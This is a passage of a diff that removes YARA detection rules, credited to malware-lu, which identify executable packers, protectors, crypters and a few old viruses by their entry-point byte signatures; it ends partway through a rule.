-		$a0 = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakeStonesPEEncryptor20FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 53 51 52 56 57 55 E8 00 00 00 00 5D 81 ED 42 30 40 00 FF 95 32 35 40 00 B8 37 30 40 00 03 C5 2B 85 1B 34 40 00 89 85 27 34 40 00 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov300
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 60 33 C9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorv11Vaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 04 24 83 E8 4F 68 ?? ?? ?? ?? FF D0 }
-	$a1 = { 8B 04 24 83 E8 4F 68 ?? ?? ?? ?? FF D0 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule Fusion10jaNooNi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 04 30 40 00 68 04 30 40 00 E8 09 03 00 00 68 04 30 40 00 E8 C7 02 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UpxLock1012CyberDoomTeamXBoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PCPEEncryptorAlphapreview
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B CD 81 ED 33 30 40 ?? 2B 8D EE 32 40 00 83 E9 0B 89 8D F2 32 40 ?? 80 BD D1 32 40 ?? 01 0F 84 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxKeypress1212
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? E8 ?? ?? E8 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EA ?? ?? ?? ?? 1E 33 DB 8E DB BB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftwareCompressv12BGSoftwareProtectTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 FF 74 24 24 6A 40 FF 95 1A 0F 41 00 89 44 24 1C 61 C2 04 00 E8 00 00 00 00 81 2C 24 3A 10 41 00 5D E8 00 00 00 00 81 2C 24 31 01 00 00 8B 85 2A 0F 41 00 29 04 24 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPackV14LiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VProtectorV11Avcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium1300ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 22 EB 02 ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 47 26 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule XXPack01bagie
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 00 68 00 ?? ?? ?? C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeLocker10IonIce
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 81 ED 05 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule yodasProtectorV101AshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 56 57 E8 03 00 00 00 EB 01 ?? E8 86 00 00 00 E8 03 00 00 00 EB 01 ?? E8 79 00 00 00 E8 03 00 00 00 EB 01 ?? E8 A4 00 00 00 E8 03 00 00 00 EB 01 ?? E8 97 00 00 00 E8 03 00 00 00 EB 01 ?? E8 2D 00 00 00 E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00 5D 81 ED D5 E4 41 00 8B D5 81 C2 23 E5 41 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv2001AlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 72 05 00 00 EB 4C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule USERNAMEv300
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FB 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 8C C8 2B C1 8B C8 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 33 C0 8E D8 06 0E 07 FC 33 F6 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule nSpackV2xLiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 }
-
-condition:
-		$a0
-}
-	
-	
-rule GameGuardv20065xxdllsignbyhot_UNP
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 31 FF 74 06 61 E9 4A 4D 50 30 BA 4C 00 00 00 80 7C 24 08 01 0F 85 ?? 01 00 00 60 BE 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upack_PatchoranyVersionDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 09 00 00 00 ?? ?? ?? 00 E9 06 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PCPECalpha
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 51 52 56 57 55 E8 ?? ?? ?? ?? 5D 8B CD 81 ?? ?? ?? ?? ?? 2B ?? ?? ?? ?? ?? 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv305c4Unextractable
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 03 05 00 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Escargot01finalMeat
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 04 40 30 2E 31 60 68 61 ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 B8 92 ?? ?? ?? 8B 00 FF D0 50 B8 CD ?? ?? ?? 81 38 DE C0 37 13 75 2D 68 C9 ?? ?? ?? 6A 40 68 00 ?? 00 00 68 00 00 ?? ?? B8 96 ?? ?? ?? 8B 00 FF D0 8B 44 24 F0 8B 4C 24 F4 EB 05 49 C6 04 01 40 0B C9 75 F7 BE 00 10 ?? ?? B9 00 ?? ?? 00 EB 05 49 80 34 31 40 0B C9 75 F7 58 0B C0 74 08 33 C0 C7 00 DE C0 AD 0B BE ?? ?? ?? ?? E9 AC 00 00 00 8B 46 0C BB 00 00 ?? ?? 03 C3 50 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MetrowerksCodeWarriorv20GUI
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 53 56 83 EC 44 55 B8 FF FF FF FF 50 50 68 ?? ?? 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? 00 00 E8 ?? ?? 00 00 E8 }
-
-condition:
-		$a0
-}
-	
-	
-rule UnnamedScrambler21Beta211p0ke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B9 15 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 ?? 3A ?? ?? E8 ?? EE FF FF 33 C0 55 68 ?? 43 ?? ?? 64 FF 30 64 89 20 BA ?? 43 ?? ?? B8 E4 64 ?? ?? E8 0F FD FF FF 8B D8 85 DB 75 07 6A 00 E8 ?? EE FF FF BA E8 64 ?? ?? 8B C3 8B 0D E4 64 ?? ?? E8 ?? D7 FF FF B8 F8 ?? ?? ?? BA 04 00 00 00 E8 ?? EF FF FF 33 C0 A3 F8 ?? ?? ?? BB ?? ?? ?? ?? C7 45 EC E8 64 ?? ?? C7 45 E8 ?? ?? ?? ?? C7 45 E4 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? B8 E0 ?? ?? ?? BA 04 00 00 00 E8 ?? EF FF FF 68 F4 01 00 00 E8 ?? EE FF FF 83 7B 04 00 75 0B 83 3B 00 0F 86 ?? 07 00 00 EB 06 0F 8E ?? 07 00 00 8B 03 8B D0 B8 E4 ?? ?? ?? E8 ?? E5 FF FF B8 E4 ?? ?? ?? E8 ?? E3 FF FF 8B D0 8B 45 EC 8B 0B E8 }
-
-condition:
-		$a0
-}
-	
-	
-rule NoodleCryptv20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 }
-	$a1 = { EB 01 9A E8 ?? 00 00 00 EB 01 9A E8 ?? ?? 00 00 EB 01 9A E8 ?? ?? 00 00 EB 01 }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule PoPa001PackeronPascalbagie
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 A4 3E 00 10 E8 30 F6 FF FF 33 C0 55 68 BE 40 00 10 ?? ?? ?? ?? 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 62 E7 FF FF 8B 45 EC E8 32 F2 FF FF 50 E8 B4 F6 FF FF A3 64 66 00 10 33 D2 55 68 93 40 00 10 64 FF 32 64 89 22 83 3D 64 66 00 10 FF 0F 84 3A 01 00 00 6A 00 6A 00 6A 00 A1 64 66 00 10 50 E8 9B F6 FF FF 83 E8 10 50 A1 64 66 00 10 50 E8 BC F6 FF FF 6A 00 68 80 66 00 10 6A 10 68 68 66 00 10 A1 64 66 00 10 50 E8 8B F6 FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule BlindSpot10s134k
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 50 02 00 00 8D 85 B0 FE FF FF 53 56 A3 90 12 40 00 57 8D 85 B0 FD FF FF 68 00 01 00 00 33 F6 50 56 FF 15 24 10 40 00 56 68 80 00 00 00 6A 03 56 56 8D 85 B0 FD FF FF 68 00 00 00 80 50 FF 15 20 10 40 00 56 56 68 00 08 00 00 50 89 45 FC FF 15 1C 10 40 00 8D 45 F8 8B 1D 18 10 40 00 56 50 6A 34 FF 35 90 12 40 00 FF 75 FC FF D3 85 C0 0F 84 7F 01 00 00 39 75 F8 0F 84 76 01 00 00 A1 90 12 40 00 66 8B 40 30 66 3D 01 00 75 14 8D 85 E4 FE FF FF 68 04 01 00 00 50 FF 15 14 10 40 00 EB 2C 66 3D 02 00 75 14 8D 85 E4 FE FF FF 50 68 04 01 00 00 FF 15 10 10 40 00 EB 12 8D 85 E4 FE FF FF 68 04 01 00 00 50 FF 15 0C 10 40 00 8B 3D 08 10 40 00 8D 85 E4 FE FF FF 68 54 10 40 00 50 }
-
-condition:
-		$a0
-}
-	
-	
-rule GamehouseMediaProtectorVersionUnknown
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? ?? ?? 6A 00 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv042
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 52 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEStealthv274WebToolMaster
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 00 EB 17 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 60 90 E8 00 00 00 00 5D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEManagerVersion301994cSolarDesigner
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B4 30 1E 06 CD 21 2E ?? ?? ?? BF ?? ?? B9 ?? ?? 33 C0 2E ?? ?? 47 E2 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv02BetaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 88 01 ?? ?? AD 8B F8 95 A5 33 C0 33 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DEFv100Engbartxt
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? 01 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? ?? 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AnslymCrypter
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 38 17 05 10 E8 5A 45 FB FF 33 C0 55 68 21 1C 05 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 E8 85 4C FB FF 6A 00 E8 0E 47 FB FF 6A 0A E8 27 49 FB FF E8 EA 47 FB FF 6A 0A 68 30 1C 05 10 A1 60 56 05 10 50 E8 68 47 FB FF 8B D8 85 DB 0F 84 B6 02 00 00 53 A1 60 56 05 10 50 E8 F2 48 FB FF 8B F0 85 F6 0F 84 A0 02 00 00 E8 F3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ARMProtectorv02SMoKE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 09 20 40 00 EB 02 83 09 8D B5 9A 20 40 00 EB 02 83 09 BA 0B 12 00 00 EB 01 00 8D 8D A5 32 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CrypKeyV56XDLLKenonicControlsLtd
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 1D ?? ?? ?? ?? 83 FB 00 75 0A E8 ?? ?? ?? ?? E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEiDBundlev102v104BoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxHeloween1172
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? 56 50 06 0E 1F 8C C0 01 ?? ?? 01 ?? ?? 80 ?? ?? ?? ?? 8B ?? ?? A3 ?? ?? 8A ?? ?? A2 ?? ?? B8 ?? ?? CD 21 3D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PackedwithPKLITEv150withCRCcheck1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1F B4 09 BA ?? ?? CD 21 B8 ?? ?? CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Pe123v2006412
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B C0 60 9C E8 01 00 00 00 C3 53 E8 72 00 00 00 50 E8 1C 03 00 00 8B D8 FF D3 5B C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B C0 55 8B EC 60 8B 4D 10 8B 7D 0C 8B 75 08 F3 A4 61 5D C2 0C 00 E8 00 00 00 00 58 83 E8 05 C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DropperCreatorV01Conflict
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 8D 05 ?? ?? ?? ?? 29 C5 8D 85 ?? ?? ?? ?? 31 C0 64 03 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 }
-
-condition:
-		$a0
-}
-	
-	
-rule XCRv013
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 93 71 08 ?? ?? ?? ?? ?? ?? ?? ?? 8B D8 78 E2 ?? ?? ?? ?? 9C 33 C3 ?? ?? ?? ?? 60 79 CE ?? ?? ?? ?? E8 01 ?? ?? ?? ?? 83 C4 04 E8 AB FF FF FF ?? ?? ?? ?? 2B E8 ?? ?? ?? ?? 03 C5 FF 30 ?? ?? ?? ?? C6 ?? EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule XCRv012
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C E8 ?? ?? ?? ?? 8B DD 5D 81 ED ?? ?? ?? ?? 89 9D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule InnoSetupModulev129
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 EC 89 45 C0 E8 5B 73 FF FF E8 D6 87 FF FF E8 C5 A9 FF FF E8 E0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov3xx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule dUP2xPatcherwwwdiablo2oo2cjbnet
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B CB 85 C9 74 ?? 80 3A 01 74 08 AC AE 75 0A 42 49 EB EF 47 46 42 49 EB E9 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner02PEProtect09Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 07 00 00 00 58 83 C0 07 C6 90 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule pscrambler12byp0ke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B9 04 00 00 00 6A 00 6A 00 49 75 F9 51 53 ?? ?? ?? ?? 10 E8 2D F3 FF FF 33 C0 55 68 E8 31 00 10 64 FF 30 64 89 20 8D 45 E0 E8 53 F5 FF FF 8B 45 E0 8D 55 E4 E8 30 F6 FF FF 8B 45 E4 8D 55 E8 E8 A9 F4 FF FF 8B 45 E8 8D 55 EC E8 EE F7 FF FF 8B 55 EC B8 C4 54 00 10 E8 D9 EC FF FF 83 3D C4 54 00 10 00 0F 84 05 01 00 00 80 3D A0 40 00 10 00 74 41 A1 C4 54 00 10 E8 D9 ED FF FF E8 48 E0 FF FF 8B D8 A1 C4 54 00 10 E8 C8 ED FF FF 50 B8 C4 54 00 10 E8 65 EF FF FF 8B D3 59 E8 69 E1 FF FF 8B C3 E8 12 FA FF FF 8B C3 E8 33 E0 FF FF E9 AD 00 00 00 B8 05 01 00 00 E8 0C E0 FF FF 8B D8 53 68 05 01 00 00 E8 57 F3 FF FF 8D 45 DC 8B D3 E8 39 ED FF FF 8B 55 DC B8 14 56 00 10 B9 00 32 00 10 E8 BB ED FF FF 8B 15 14 56 00 10 B8 C8 54 00 10 E8 53 E5 FF FF BA 01 00 00 00 B8 C8 54 00 10 E8 8C E8 FF FF E8 DF E0 FF FF 85 C0 75 52 6A 00 A1 C4 54 00 10 E8 3B ED FF FF 50 B8 C4 54 00 10 E8 D8 EE FF FF 8B D0 B8 C8 54 00 10 59 E8 3B E6 FF FF E8 76 E0 FF FF B8 C8 54 00 10 E8 4C E6 FF FF E8 67 E0 FF FF 6A 00 6A 00 6A 00 A1 14 56 00 10 E8 53 EE FF FF 50 6A 00 6A 00 E8 41 F3 FF FF 80 3D 9C 40 00 10 00 74 05 E8 EF FB FF FF 33 C0 5A 59 59 64 89 10 68 EF 31 00 10 8D 45 DC BA 05 00 00 00 E8 7D EB FF FF C3 E9 23 E9 FF FF EB EB 5B E8 63 EA FF FF 00 00 00 FF FF FF FF 08 00 00 00 74 65 6D 70 2E 65 78 65 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor2223compressedcodewwwstrongbitcom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 58 ?? ?? ?? ?? ?? 8B 1C 24 81 EB ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 6A 04 68 00 10 00 00 50 6A 00 B8 C4 ?? ?? ?? 8B 04 18 FF D0 59 BA ?? ?? ?? ?? 01 DA 52 53 50 89 C7 89 D6 FC F3 A4 B9 ?? ?? ?? ?? 01 D9 FF D1 58 8B 1C 24 68 00 80 00 00 6A 00 50 }
-	$a1 = { E8 00 00 00 00 58 ?? ?? ?? ?? ?? 8B 1C 24 81 EB ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 6A 04 68 00 10 00 00 50 6A 00 B8 C4 ?? ?? ?? 8B 04 18 FF D0 59 BA ?? ?? ?? ?? 01 DA 52 53 50 89 C7 89 D6 FC F3 A4 B9 ?? ?? ?? ?? 01 D9 FF D1 58 8B 1C 24 68 00 80 00 00 6A 00 50 B8 C8 ?? ?? ?? 8B 04 18 FF D0 59 58 5B 83 EB 05 C6 03 B8 43 89 03 83 C3 04 C6 03 C3 09 C9 74 46 89 C3 E8 A0 00 00 00 FC AD 83 F8 FF 74 38 53 89 CB 01 C3 01 0B 83 C3 04 AC 3C FE 73 07 25 FF 00 00 00 EB ED 81 C3 FE 00 00 00 09 C0 7A 09 66 AD 25 FF FF 00 00 EB DA AD 4E 25 FF FF FF 00 3D FF FF FF 00 75 CC ?? ?? ?? ?? ?? C3 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule Armadillov265b1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 38 ?? ?? ?? 68 40 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 F4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackFullEdition117aPLibAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 74 1F 00 00 8D 9D 1E 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PolyCryptPE214b215JLabSoftwareCreationshoep
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 91 8B F4 AD FE C9 80 34 08 ?? E2 FA C3 60 E8 ED FF FF FF EB }
-
-condition:
-		$a0
-}
-	
-	
-rule yodasProtector10xAshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 56 57 E8 03 00 00 00 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upack_UnknownDLLDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 09 00 00 00 17 CD 00 00 E9 06 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AINEXEv21
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { A1 ?? ?? 2D ?? ?? 8E D0 BC ?? ?? 8C D8 36 A3 ?? ?? 05 ?? ?? 36 A3 ?? ?? 2E A1 ?? ?? 8A D4 B1 04 D2 EA FE C9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AppProtectorSilentTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 97 00 00 00 0D 0A 53 69 6C 65 6E 74 20 54 65 61 6D 20 41 70 70 20 50 72 6F 74 65 63 74 6F 72 0D 0A 43 72 65 61 74 65 64 20 62 79 20 53 69 6C 65 6E 74 20 53 6F 66 74 77 61 72 65 0D 0A 54 68 65 6E 6B 7A 20 74 6F 20 44 6F 63 68 74 6F 72 20 58 0D 0A 0D 0A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RODHighTECHAyman
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 8B 15 1D 13 40 00 F7 E0 8D 82 83 19 00 00 E8 58 0C 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ICrypt10byBuGGz
-{
-      meta:
-		author="malware-lu"
-strings:
